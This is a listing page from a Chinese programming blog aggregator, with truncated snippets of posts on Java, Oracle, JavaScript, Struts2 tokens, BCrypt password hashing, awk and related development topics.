         最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求)     方案一 使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回     缺点       测试发现必须3个接
  • 调试jdk中的源码,查看jdk局部变量 程序员是怎么炼成的 jdk 源码
    转自:http://www.douban.com/note/211369821/    学习jdk源码时使用--   学习java最好的办法就是看jdk源代码,面对浩瀚的jdk(光源码就有40M多,比一个大型网站的源码都多)从何入手呢,要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。 可惜的是sun提供的jdk并不能查看运行中的局部变量
  • Oracle RAC Failover 详解 aijuans oracle
    Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用,连接到故障节点的用户会被自动转移到健康节点,从用户感受而言, 是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种: 1. Client-Si
  • form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScripttomcat浏览器互联网servlet
    原帖地址:http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器,get和post,分别说下吧。 (一)get提交 1.首先说下客户端(浏览器)的form表单用get方法是如何将数据编码后提交给服务器端的吧。    对于get方法来说,都是把数据串联在请求的url后面作为参数,如:http://localhost:
  • JS初学者必知的基础 百合不是茶 js函数js入门基础
    JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言,它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。 许多 HTML 开发者都不是程序员,但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
  • iBatis的分页分析与详解 bijian1013 javaibatis
            分页是操作数据库型系统常遇到的问题。分页实现方法很多,但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分,发现返回的PaginatedList实际上是个接口,实现这个接口的是PaginatedDataList类的对象,查看PaginatedDataList类发现,每次翻页的时候最
  • 精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle数据库plsql
    /* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
  • 【Linux命令二】文本处理命令awk bit1129 linux命令
    awk是Linux用来进行文本处理的命令,在日常工作中,广泛应用于日志分析。awk是一门解释型编程语言,包含变量,数组,循环控制结构,条件控制结构等。它的语法采用类C语言的语法。   awk命令用来做什么? 1.awk适用于具有一定结构的文本行,对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理,然后把直接结构返回给awk 3.awk实际工
  • JAVA(ssh2框架)+Flex实现权限控制方案分析 白糖_ java
      目前项目使用的是Struts2+Hibernate+Spring的架构模式,目前已经有一套针对SSH2的权限系统,运行良好。但是项目有了新需求:在目前系统的基础上使用Flex逐步取代JSP,在取代JSP过程中可能存在Flex与JSP并存的情况,所以权限系统需要进行修改。 【SSH2权限系统的实现机制】 权限控制分为页面和后台两块:不同类型用户的帐号分配的访问权限是不同的,用户使
  • angular.forEach boyitech AngularJSAngularJS APIangular.forEach
    angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象,key是obj的property key或者是数组的index,value就是相应的值啦. (此函数不能够迭代继承的属性.)
  • java-谷歌面试题-给定一个排序数组,如何构造一个二叉排序树 bylijinnan 二叉排序树
    import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组,如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
  • action执行2次 Chen.H JavaScriptjspXHTMLcssWebwork
    xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
  • [时空与能量]逆转时空需要消耗大量能源 comsci 能源
            无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越.....         在进行时空穿梭的实验中,消耗超大规模的能源是必然
  • oracle的正则表达式(regular expression)详细介绍 daizj oracle正则表达式
        正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入,好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。 正则表达式中常用到的元数据(metacharacter)如下: ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
  • 报表工具与报表性能的关系 datamachine 报表工具birt报表性能润乾报表
    在选择报表工具时,性能一直是用户关心的指标,但是,报表工具的性能和整个报表系统的性能有多大关系呢? 要回答这个问题,首先要分析一下报表的处理过程包含哪些环节,哪些环节容易出现性能瓶颈,如何优化这些环节。   一、报表处理的一般过程分析 1、用户选择报表输入参数后,报表引擎会根据报表模板和输入参数来解析报表,并将数据计算和读取请求以SQL的方式发送给数据库。   2、
  • 初一上学期难记忆单词背诵第一课 dcj3sjt126com wordenglish
    what 什么  your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级,课   six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
  • 我学过和准备学的各种技术 dcj3sjt126com 技术
    语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html 
  • struts2中token防止重复提交表单 蕃薯耀 重复提交表单struts2中token
    struts2中token防止重复提交表单   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
  • 线性查找二维数组 hao3100590 二维数组
    1.算法描述 有序(行有序,列有序,且每行从左至右递增,列从上至下递增)二维数组查找,要求复杂度O(n)   2.使用到的相关知识: 结构体定义和使用,二维数组传递(http://blog.csdn.net/yzhhmhm/article/details/2045816)   3.使用数组名传递 这个的不便之处很明显,一旦确定就是不能设置列值 //使
  • spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
    spring security 3中推荐使用BCrypt算法加密密码了,以前使用的是md5, Md5PasswordEncoder 和 ShaPasswordEncoder,现在不推荐了,推荐用bcrpt Bcrpt中的salt可以是随机的,比如: int i = 0; while (i < 10) { String password = "1234
  • 学习编程并不难,做到以下几点即可! lampcy javahtml编程语言
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • 架构师之mysql----------------用group+inner join,left join ,right join 查重复数据(替代in) nannan408 right join
    1.前言。   如题。 2.代码 (1)单表查重复数据,根据a分组   SELECT m.a,m.b, INNER JOIN (select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a (2)多表查询 , 使用改为le
  • jQuery选择器小结 VS 节点查找(附css的一些东西) Everyday都不同 jquerycssname选择器追加元素查找节点
    最近做前端页面,频繁用到一些jQuery的选择器,所以特意来总结一下:   测试页面: <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
  • 关于EXT tntxia ext
      ExtJS是一个很不错的Ajax框架,可以用来开发带有华丽外观的富客户端应用,使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写,与后台技术无关的前端ajax框架。因此,可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。       ExtJs最开始基于YUI技术,由开发人员Jack
  • 一个MIT计算机博士对数学的思考 xjnine Math
     在过去的一年中,我一直在数学的海洋中游荡,research进展不多,对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界?作为计算机的学生,我没有任何企图要成为一个数学家。我学习数学的目的,是要想爬上巨人的肩膀,希望站在更高的高度,能把我自己研究的东西看得更深广一些。说起来,我在刚来这个学校的时候,并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目,是对appe
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他